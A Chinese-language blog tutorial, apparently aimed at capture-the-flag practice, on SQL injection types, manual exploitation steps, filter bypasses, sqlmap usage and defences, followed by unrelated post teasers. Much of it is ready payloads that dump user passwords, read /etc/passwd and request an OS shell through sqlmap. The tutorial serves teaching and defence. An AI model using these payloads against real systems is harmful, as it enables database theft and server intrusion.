当前位置：首页 > news >正文

SQL注入（SQL Injection）详解与实战

news 2025/9/29 17:00:15

文章目录

- 一、什么是SQL注入？
- 二、常见SQL注入类型
- 三、手动注入步骤（以CTF题目为例）
- 四、CTF实战技巧
- 五、自动化工具：SQLMap
- 六、防御措施
- 七、CTF例题
- 八、资源推荐

一、什么是SQL注入？

SQL注入是一种通过用户输入构造恶意SQL语句，干扰后端数据库查询逻辑的攻击方式。攻击者可通过注入获取敏感数据、篡改数据库或执行系统命令。

二、常见SQL注入类型

联合查询注入（Union-Based）
利用UNION SELECT拼接查询结果，直接回显数据。

' UNION SELECT username, password FROM users--
报错注入（Error-Based）
通过触发数据库报错泄露信息（如MySQL的updatexml或extractvalue）。

' AND updatexml(1, concat(0x7e, (SELECT user())), 1)--
布尔盲注（Boolean-Based Blind）
通过页面返回的真假状态推断数据（如返回内容差异或HTTP状态码）。

' AND (SELECT SUBSTR(password,1,1) FROM users WHERE id=1)='a'--
时间盲注（Time-Based Blind）
通过延时响应判断条件是否成立（如MySQL的sleep()）。

' AND IF(1=1, SLEEP(5), 0)--

三、手动注入步骤（以CTF题目为例）

检测注入点
- 输入单引号'触发数据库错误（如You have an error in your SQL syntax）。
- 测试逻辑条件：
  
  id=1' AND 1=1-- （页面正常） id=1' AND 1=2-- （页面异常）
确定字段数（ORDER BY）

' ORDER BY 3-- （无报错） ' ORDER BY 4-- （报错→字段数为3）
联合查询获取数据

' UNION SELECT 1,2,3-- （确定回显位） ' UNION SELECT database(), user(), version()--
提取表名与列名

' UNION SELECT 1, group_concat(table_name), 3 FROM information_schema.tables WHERE table_schema=database()-- ' UNION SELECT 1, group_concat(column_name), 3 FROM information_schema.columns WHERE table_name='users'--
获取敏感数据

' UNION SELECT 1, username, password FROM users--

四、CTF实战技巧

绕过过滤
- 大小写绕过：UnIoN SeLeCt（部分过滤器不区分大小写）。
- 注释符：-- （空格）、#、/*...*/。
- 编码绕过：URL编码（%27代替'）、十六进制（0x...）。
- 空格绕过：用/**/或+代替空格（如UNION/**/SELECT）。
利用字符串拼接
- MySQL：'||'1'='1' → ' OR '1'='1。
- SQLite：'||1=1-- 。
利用数据库特性
- MySQL：LOAD_FILE('/etc/passwd')读取文件。
- PostgreSQL：pg_read_file('/etc/passwd')。
- SQLite：sqlite_version()获取版本。

五、自动化工具：SQLMap

基本用法

sqlmap -u "http://target.com/page?id=1" --dbs # 获取所有数据库名 sqlmap -u "http://target.com/page?id=1" -D dbname --tables # 获取表名 sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump # 导出数据
高级参数
- --level=3：提高检测等级（包含Cookie注入）。
- --risk=3：允许高风险操作（如文件写入）。
- --os-shell：尝试获取系统Shell（需高权限）。

六、防御措施

参数化查询（预编译）

Python

# Python示例（使用SQLAlchemy） result = db.session.execute('SELECT * FROM users WHERE id = :id', {'id': user_id})
输入过滤
- 过滤特殊字符（' " ; --）。
- 限制输入类型（如数字类型强制转换为整数）。
最小权限原则
- 数据库用户仅授予必要权限（禁止FILE、EXECUTE等）。

七、CTF例题

题目：登录页面存在SQL注入，获取管理员密码。

SQL

' OR 1=1 -- ' UNION SELECT null, password FROM users WHERE username='admin'--
题目：过滤了空格和UNION，利用盲注获取数据。

SQL

'||(SELECT CASE WHEN (SUBSTR(password,1,1)='a') THEN SLEEP(5) ELSE 0 END FROM users)#

八、资源推荐

练习平台：
- PortSwigger SQLi Labs（https://portswigger.net/web-security/sql-injection）
- SQLi Labs（GitHub开源靶场）
深入阅读：
- 《SQL注入攻击与防御（第2版）》
- OWASP SQL Injection Cheat Sheet

SQL注入（SQL Injection）详解与实战

文章目录一、什么是SQL注入？二、常见SQL注入类型三、手动注入步骤（以CTF题目为例）四、CTF实战技巧五、自动化工具：SQLMap六、防御措施七、CTF例题八、资源推荐一、什么是SQL注入？ SQL注入是一种通过用户输入构造恶意…...

编程日记 2025/2/18 16:43:22

【Prometheus】prometheus结合domain_exporter实现域名监控

✨✨ 欢迎大家来到景天科技苑✨✨ 🎈🎈 养成好习惯，先赞后看哦~🎈🎈 🏆 作者简介：景天科技苑 🏆《头衔》：大厂架构师，华为云开发者社区专家博主，阿里云开发者社区专家博主，CSDN全栈领域优质创作者，掘金优秀博主，51CTO博客专家等。 🏆《博客》：Python全…...

编程日记 2025/2/18 16:42:20

Java 设计模式之命令模式

文章目录 Java 设计模式之命令模式概述UML代码实现简单实现复杂实现 Java 设计模式之命令模式概述命令模式(Command)：将一个请求封装为一个对象，从而使你可用不同的请求对客户进行参数化；对请求排队或记录请求日志，以及支持可…...

编程日记 2025/2/18 16:41:16

BT401双模音频蓝牙模块如何开启ble的透传,有什么注意事项

BT401音频蓝牙模块如何开启ble的透传？ 首先BT401的蓝牙音频模块，分为两个版本，dac版本和iis数字音频版本 DAC版本：就是BT401蓝牙模块【9和10脚】直接输出模拟音频信号，也就是说，直接推动耳机可以听到声音 …...

编程日记 2025/2/18 16:39:13

一、布尔盲注： import requestsdef binary_search_character(url, query, index, low32, high127):while low < high:mid (low high 1) // 2payload f"1 AND ASCII(SUBSTRING(({query}),{index},1)) > {mid} -- "res {"id": payloa…...

编程日记 2025/2/18 16:37:10

Vue 项目登录的基本流程

Vue 用户登录的基本流程包括以下6个步骤： 步骤： 1. 创建登录表单在前端，首先要创建一个登录表单，用户输入账号（用户名、邮箱、手机号等）和密码。示例：Login.vue <template><div…...

编程日记 2025/2/18 16:34:04

kubernetes源码分析 kubelet

简介从官方的架构图中很容易就能找到 kubelet 执行 kubelet -h 看到 kubelet 的功能介绍： kubelet 是每个 Node 节点上都运行的主要“节点代理”。使用如下的一个向 apiserver 注册 Node 节点：主机的 hostname；覆盖 host 的参数&#xff1…...

编程日记 2025/2/18 16:27:53

Web3 开发者周刊 36 | 构建自主未来：Agent、可扩展性与赏金

欢迎来到 Web3 开发者周刊 36，这里汇聚了赋能您的 Web3 构建之旅的各种资源。本周我们将剖析基于Agent的系统，讨论来自 Vitalik 关于以太坊 L1 和 L2 的最新思考，并提供最新高价值Bounty消息。开始Build吧！ ✅ One Trillion Age…...

编程日记 2025/2/18 16:24:48

零基础入门机器学习 -- 第十一章机器学习模型的评估与优化

如何判断你的模型到底行不行？ 11.1 为什么需要评估模型？ 场景设定：信用卡欺诈检测想象你是ABC银行的风控经理，你每天的工作就是盯着上百万笔交易，防止客户的信用卡被盗刷。你们银行新推出了一款机器学习模型&…...

编程日记 2025/2/18 16:18:38

菜鸟之路Day15一一IO流(一)

菜鸟之路Day15一一IO流（一） 作者：blue 时间：2025.2.8 文章目录菜鸟之路Day15一一IO流（一）0.概述1.初识IO流1.1.什么是IO流？1.2.IO流的作用1.3.IO流的分类 2.IO流的体系结构3.字节输出流的基本…...

编程日记 2025/2/18 16:14:28

动手学Agent——Day2

文章目录一、用 Llama-index 创建 Agent1. 测试模型2. 自定义一个接口类3. 使用 ReActAgent & FunctionTool 构建 Agent 二、数据库对话 Agent1. SQLite 数据库1.1 创建数据库 & 连接1.2 创建、插入、查询、更新、删除数据1.3 关闭连接建立数据库 2. ollama3. 配置对话…...

编程日记 2025/2/18 16:08:11

JSONObject,TreeUtil,EagelMap,BeanUtil使用

目录 JSONObject的使用 TreeUtil的使用 EagleMap使用安装 application.yml配置 springboot导入依赖配置信息简单使用如果想获取这个json字符串里面的distance的值 BeanUtil拷贝注意 JSONObject的使用假如我现在要处理这样的json数据可以直接使用JSONUtil.parseObj…...

编程日记 2025/2/18 15:59:59

Unity嵌入到Winform

Unity嵌入到Winform Winform工程🌈...

编程日记 2025/2/18 15:56:55

TCP/UDP协议与OSI七层模型的关系解析| HTTPS与HTTP安全性深度思考》

目录 OSI 7层模型每一层包含的协议： TCP和UDP协议： TCP (Transmission Control Protocol)： UDP (User Datagram Protocol)： 数据包流程图 TCP与UDP的区别： 传输层与应用层的关联传输层和应用层的关联&#xf…...

编程日记 2025/2/18 15:55:50

《Zookeeper 分布式过程协同技术详解》读书笔记-2

目录 zk的一些内部原理和应用请求，事务和标识读写操作事务标识（zxid） 群首选举Zab协议（ZooKeeper Atomic Broadcast protocol）文件系统和监听通知机制分布式配置中心, 简单Demojava code 集群管理code 分布式锁 zk的一…...

编程日记 2025/2/18 15:53:46

缺陷检测之图片标注工具--labme

一、labelme简介 Labelme是开源的图像标注工具，常用做检测，分割和分类任务的图像标注。它的功能很多，包括： 对图像进行多边形，矩形，圆形，多段线，线段，点形式的标注&a…...

编程日记 2025/2/18 15:51:41

机器学习_13 决策树知识总结

决策树是一种直观且强大的机器学习算法，广泛应用于分类和回归任务。它通过树状结构的决策规则来建模数据，易于理解和解释。今天，我们就来深入探讨决策树的原理、实现和应用。一、决策树的基本概念 1.1 决策树的工作原理决策树是一种基于…...

编程日记 2025/2/18 15:49:33

请解释一下Standford Alpaca格式、sharegpt数据格式-------deepseek问答记录

1 Standford Alpaca格式 json格式数据。Stanford Alpaca 格式是一种用于训练和评估自然语言处理（NLP）模型的数据格式，特别是在指令跟随任务中。它由斯坦福大学的研究团队开发，旨在帮助模型理解和执行自然语言指令。以下是该格式的…...

编程日记 2025/2/18 15:47:22

ubuntu 安装管理多版本python3 相关问题解决

背景：使用ubuntu 22.04 默认python 未3.10.编译一些模块的时候发现需要降级到python3.9.于是下载安装下载： wget https://www.python.org/ftp/python/3.9.16/Python-3.9.16.tgz解压与编译 tar -xf Python-3.9.16.tgz cd Python-3.9.16 ./configure -…...

编程日记 2025/2/18 15:46:19

滑动窗口算法篇：连续子区间与子串问题

1.滑动窗口原理那么一谈到子区间的问题，我们可能会想到我们可以用我们的前缀和来应用子区间问题，但是这里对于子区间乃至子串问题，我们也可以尝试往滑动窗口的思路方向去进行一个尝试，那么说那么半天，滑动窗口是什么…...

编程日记 2025/2/18 15:39:03

浏览器访问 AWS ECS 上部署的 Docker 容器（监听 80 端口）

✅ 一、ECS 服务配置 Dockerfile 确保监听 80 端口 EXPOSE 80 CMD ["nginx", "-g", "daemon off;"]或 EXPOSE 80 CMD ["python3", "-m", "http.server", "80"]任务定义（Task Definition&…...

编程新知 2025/9/28 9:51:11

【力扣数据库知识手册笔记】索引

索引索引的优缺点优点1. 通过创建唯一性索引，可以保证数据库表中每一行数据的唯一性。2. 可以加快数据的检索速度（创建索引的主要原因）。3. 可以加速表和表之间的连接，实现数据的参考完整性。4. 可以在查询过程中，…...

编程新知 2025/9/28 18:12:53

DAY 47

三、通道注意力 3.1 通道注意力的定义 # 新增：通道注意力模块（SE模块） class ChannelAttention(nn.Module):"""通道注意力模块(Squeeze-and-Excitation)"""def __init__(self, in_channels, reduction_rat…...

编程新知 2025/9/28 2:00:00

UDP(Echoserver)

网络命令 Ping 命令检测网络是否连通使用方法: ping -c 次数网址ping -c 3 www.baidu.comnetstat 命令 netstat 是一个用来查看网络状态的重要工具. 语法：netstat [选项] 功能：查看网络状态常用选项： n 拒绝显示别名&#…...

编程新知 2025/9/28 23:10:43

el-switch文字内置

el-switch文字内置效果 vue <div style"color:#ffffff;font-size:14px;float:left;margin-bottom:5px;margin-right:5px;">自动加载</div> <el-switch v-model"value" active-color"#3E99FB" inactive-color"#DCDFE6"…...

编程新知 2025/9/28 5:21:21

网络编程（UDP编程）

思维导图 UDP基础编程（单播） 1.流程图服务器：短信的接收方创建套接字 (socket)-----------------------------------------》有手机指定网络信息-----------------------------------------------》有号码绑定套接字 (bind)--------------…...

编程新知 2025/9/28 3:32:19

Web中间件--tomcat学习

Web中间件–tomcat Java虚拟机详解什么是JAVA虚拟机 Java虚拟机是一个抽象的计算机，它可以执行Java字节码。Java虚拟机是Java平台的一部分，Java平台由Java语言、Java API和Java虚拟机组成。Java虚拟机的主要作用是将Java字节码转换为机器代码&#x…...

编程新知 2025/9/13 18:20:34